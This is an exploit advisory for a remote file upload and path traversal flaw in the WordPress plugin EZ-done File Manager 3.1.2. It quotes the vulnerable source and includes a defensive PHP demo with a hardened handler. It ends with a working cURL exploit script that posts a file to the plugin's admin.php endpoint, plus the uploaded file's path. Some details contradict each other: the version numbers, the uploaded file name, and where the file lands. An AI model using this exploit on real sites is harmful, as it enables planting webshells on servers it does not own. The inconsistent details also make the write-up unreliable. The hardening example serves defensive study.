* Exploit Title: WordPress EZ-done File Manager 3.1.2 - Remote File Upload
* Google Dork: N/A
* Date: 2020.10.28
* Exploit Author: Milad Karimi
* Vendor Homepage: https://wordpress.org/plugins/ez-done-file-manager/
* Software Link: https://wordpress.org/plugins/ez-done-file-manager/
* Category: webapps
* Version: 1.0
* Tested on: Windows 10, Firefox
* CVE : N/A
Vulnerable Source (line numbers are those of the plugin source, listed in execution order):
349: $MDP_target = filter_var($_REQUEST['ftarget'], FILTER_SANITIZE_STRING);
351: $upload_dir = wp_upload_dir();
352: $AddDir = $upload_dir['basedir'] . "/" . $MDP_target;
367: $_FILES['file']['name'] = str_replace(' ', '_', sanitize_file_name($_FILES['file']['name']));
375: $tmp_filepath = $_FILES['file']['tmp_name'];
378: $target = $AddDir . sanitize_file_name($_FILES['file']['name']);
379: move_uploaded_file($tmp_filepath, $target)
The destination directory is built from the ftarget request parameter, which only passes through FILTER_SANITIZE_STRING (that filter strips tags and encodes quotes; it does not touch "/" or ".."), and the file name only passes through sanitize_file_name() before move_uploaded_file() writes the upload to the resulting path.
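The path construction shown in the listing above, reproduced as a stand-alone script next to a hardened version of the same handler. This is an added example and not the plugin's code: wp_upload_dir() and sanitize_file_name() are WordPress functions that do not exist outside WordPress, so the base directory is passed in as a parameter and sanitize_stub() is an assumed, reduced stand-in for sanitize_file_name(). The ftarget and file-name inputs at the bottom are constructed for the demo.

```php
<?php
// Added example, not the plugin's code: the target-path construction from the
// vulnerable source above, reproduced stand-alone, beside a hardened handler.
// $basedir stands in for wp_upload_dir()['basedir']; sanitize_stub() is an
// assumed, reduced stand-in for WordPress's sanitize_file_name().

function sanitize_stub(string $name): string {
    // Assumption: keeps only letters, digits, dot, underscore and dash, a
    // conservative subset of what sanitize_file_name() leaves in place.
    return trim(preg_replace('/[^A-Za-z0-9._-]/', '', $name), '.');
}

// Mirrors lines 349-378: the directory comes straight from ftarget after
// FILTER_SANITIZE_STRING, which strips tags and encodes quotes but leaves "/"
// and ".." untouched, so the request decides where the file is written.
function vulnerable_target(string $basedir, string $ftarget, string $filename): string {
    $MDP_target = filter_var($ftarget, FILTER_SANITIZE_STRING);
    $AddDir = $basedir . "/" . $MDP_target;
    return $AddDir . sanitize_stub($filename);
}

// Hardened version: resolve the directory and require it to stay inside
// $basedir, then allow-list the extension and reject php double extensions.
function hardened_target(string $basedir, string $ftarget, string $filename): ?string {
    $root = realpath($basedir);
    $dir  = realpath($basedir . '/' . $ftarget);
    if ($root === false || $dir === false) {
        return null;                                   // directory does not exist
    }
    $rootPrefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($dir . DIRECTORY_SEPARATOR, $rootPrefix, strlen($rootPrefix)) !== 0) {
        return null;                                   // resolved outside the uploads root
    }
    $clean = sanitize_stub(basename($filename));
    $parts = explode('.', $clean);
    $ext   = strtolower(array_pop($parts));
    if ($clean === '' || count($parts) === 0
        || !in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'pdf'], true)) {
        return null;                                   // no extension or not allow-listed
    }
    foreach ($parts as $segment) {                     // name.php.jpg style double extensions
        if (preg_match('/^ph(p\d?|tml|ar|ps)$/i', $segment)) {
            return null;
        }
    }
    return $dir . DIRECTORY_SEPARATOR . $clean;
}

// Constructed demo inputs; a scratch uploads tree is created under the temp dir.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ezdm-demo';
@mkdir($base . DIRECTORY_SEPARATOR . 'docs', 0700, true);

echo vulnerable_target($base, '../../', 'file.php;.jpg'), PHP_EOL;   // constructed traversal input
var_dump(hardened_target($base, '../../', 'file.php;.jpg'));          // same traversal input
var_dump(hardened_target($base, 'docs/', 'file.php;.jpg'));           // constructed double-extension name
var_dump(hardened_target($base, 'docs/', 'photo.jpg'));               // constructed allow-listed name
```

Run with `php` from the command line. vulnerable_target() returns a path that has left $base for the traversal input; hardened_target() returns null for the traversal input and for the double-extension name, and a path under $base/docs only for the allow-listed name. FILTER_SANITIZE_STRING is kept because the plugin source uses it; PHP 8.1 and later print a deprecation notice for it, which is one more reason to replace it with the realpath check rather than a string filter.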
Exploit:
<?php
// Local file to upload and the plugin endpoint that receives the POST
$sh  = "file.jpg";
$url = "http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/admin.php";

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'file'    => new CURLFile($sh),  // field name matches $_FILES['file'] in the vulnerable source
    'ftarget' => '',                 // appended to wp_upload_dir()['basedir'] by the plugin; set as needed
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
if ($result === false) {
    echo "curl error: " . curl_error($ch) . PHP_EOL;
}
curl_close($ch);
print $result;
?>
Uploaded file location:
http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/file.php;.jpg